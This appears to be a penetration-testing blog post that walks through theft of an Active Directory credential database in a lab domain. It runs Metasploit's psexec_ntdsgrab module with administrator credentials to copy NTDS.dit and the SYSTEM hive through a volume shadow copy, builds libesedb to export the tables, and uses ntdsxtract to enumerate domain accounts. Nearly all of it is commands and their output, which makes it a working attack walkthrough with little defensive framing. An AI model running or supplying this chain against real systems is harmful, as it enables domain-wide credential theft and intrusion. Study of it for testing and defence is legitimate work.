metasploit - psexec_ntdsgrab / libesedb / ntdsxtract

psexec_ntdsgrab

msf auxiliary(psexec_ntdsgrab) > show options 

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CREATE_NEW_VSC        false            no        If true, attempts to create a volume shadow copy
   RHOST                 192.168.10.32    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             PENTEST.COM      no        The Windows domain to use for authentication
   SMBPass               pass1234PASS~    no        The password for the specified username
   SMBSHARE              C$               yes       The name of a writeable share on the server
   SMBUser               administrator    no        The username to authenticate as
   VSCPATH                                no        The path to the target Volume Shadow Copy
   WINPATH               Windows          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf auxiliary(psexec_ntdsgrab) > run

[*] 192.168.10.32:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Checking if NTDS.dit was copied.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Downloading ntds.dit file
[+] 192.168.10.32:445 - ntds.dit stored at /home/notfound/.msf4/loot/20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
[*] 192.168.10.32:445 - Downloading SYSTEM hive file
[+] 192.168.10.32:445 - SYSTEM hive stored at /home/notfound/.msf4/loot/20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
[*] 192.168.10.32:445 - Executing cleanup...
[*] 192.168.10.32:445 - Cleanup was successful
[*] Auxiliary module execution completed

Install libesedb

root:/ /# uname -a
Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh
root:/tmp/ntds /# git config --global http.sslverify false
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit 
esedbexport: error while loading shared libraries: libesedb.so.1: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit 
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag1) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total 33572
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root  9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root     1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root    72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root      613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root    42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root     1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root     5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root       57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root      103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x 5 root root     4096 Sep 12 12:44 ntdsxtract
-rw-r--r-- 1 root root    57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root      152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root       80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root      771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root   180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root    75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root     3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root    23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root       14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root       96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root   182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root    50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root    67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /# 

NTDSXTRACT

root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./

[+] Started at: Sat, 12 Sep 2015 04:49:55 UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 3458 records processed
[+] Sanity checks...
      Schema record id: 1774
      Schema type id: 10
[+] Extracting schema information - 100% -> 1517 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...

List of users:
==============
Record ID:            3510
User name:            Administrator
User principal name:  
SAM Account name:     Administrator
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 6b36f08b-c8cf-4eab-9e18-ae1bdce0e4f6
SID:                  S-1-5-21-495298362-4107897003-3932503283-500
When created:         2015-04-11 10:08:32+00:00
When changed:         2015-09-11 17:15:30+00:00
Account expires:      Never
Password last set:    2015-09-11 17:15:30.234375+00:00
Last logon:           2015-09-11 17:15:59.890625+00:00
Last logon timestamp: 2015-09-11 17:15:30.218750+00:00
Bad password time     2015-04-11 13:34:02.937500+00:00
Logon count:          19
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Administrator

Record ID:            3511
User name:            Guest
User principal name:  
SAM Account name:     Guest
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 5d3b8bbf-5d0a-4573-96fa-ecdf0d68b2b9
SID:                  S-1-5-21-495298362-4107897003-3932503283-501
When created:         2015-04-11 10:08:32+00:00
When changed:         2015-04-11 10:08:32+00:00
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    PWD_NOTREQD
    NORMAL_ACCOUNT
    DONT_EXPIRE_PASSWORD
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Guest

Record ID:            3557
User name:            krbtgt
User principal name:  
SAM Account name:     krbtgt
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 d4a001b1-1d6f-4033-8396-5b50ed442416
SID:                  S-1-5-21-495298362-4107897003-3932503283-502
When created:         2015-04-11 10:21:27+00:00
When changed:         2015-04-11 10:36:38+00:00
Account expires:      Never
Password last set:    2015-04-11 10:21:27.750000+00:00
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, krbtgt

Record ID:            3717
User name:            python
User principal name:  
SAM Account name:     python
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 37218973-1887-4768-a98b-c9c797769ebc
SID:                  S-1-5-21-495298362-4107897003-3932503283-1111
When created:         2015-04-11 10:40:57+00:00
When changed:         2015-04-11 10:42:50+00:00
Account expires:      Never
Password last set:    2015-04-11 10:40:57.406250+00:00
Last logon:           2015-04-11 11:27:15.796875+00:00
Last logon timestamp: 2015-04-11 10:42:50.531250+00:00
Bad password time     2015-04-11 11:26:15.359375+00:00
Logon count:          36
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, python

Record ID:            3720
User name:            juzi
User principal name:  
SAM Account name:     juzi
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 b29311a1-595a-4a8c-a292-2f623ad2969b
SID:                  S-1-5-21-495298362-4107897003-3932503283-1114
When created:         2015-04-11 10:42:09+00:00
When changed:         2015-04-11 10:47:14+00:00
Account expires:      Never
Password last set:    2015-04-11 10:42:09.375000+00:00
Last logon:           2015-04-11 11:50:41.937500+00:00
Last logon timestamp: 2015-04-11 10:47:14.015625+00:00
Bad password time     2015-04-11 10:54:08.187500+00:00
Logon count:          7
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, juzi

Record ID:            3722
User name:            jin
User principal name:  
SAM Account name:     jin
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 23b53357-d35c-4586-a239-cd930497bf7a
SID:                  S-1-5-21-495298362-4107897003-3932503283-1116
When created:         2015-04-11 10:46:32+00:00
When changed:         2015-04-11 10:49:45+00:00
Account expires:      Never
Password last set:    2015-04-11 10:46:32.250000+00:00
Last logon:           2015-04-11 10:49:49+00:00
Last logon timestamp: 2015-04-11 10:49:45.875000+00:00
Bad password time     Never
Logon count:          5
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, jin

Record ID:            3726
User name:            debug
User principal name:  
SAM Account name:     debug
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 114da9cb-7770-4ec8-b2b1-03b2505521db
SID:                  S-1-5-21-495298362-4107897003-3932503283-1119
When created:         2015-04-11 10:56:04+00:00
When changed:         2015-04-11 10:58:13+00:00
Account expires:      Never
Password last set:    2015-04-11 10:56:04.515625+00:00
Last logon:           2015-04-11 17:17:21.250000+00:00
Last logon timestamp: 2015-04-11 10:58:13+00:00
Bad password time     Never
Logon count:          95
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, debug

References

http://www.ntdsxtract.com/
https://github.com/libyal/libesedb/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值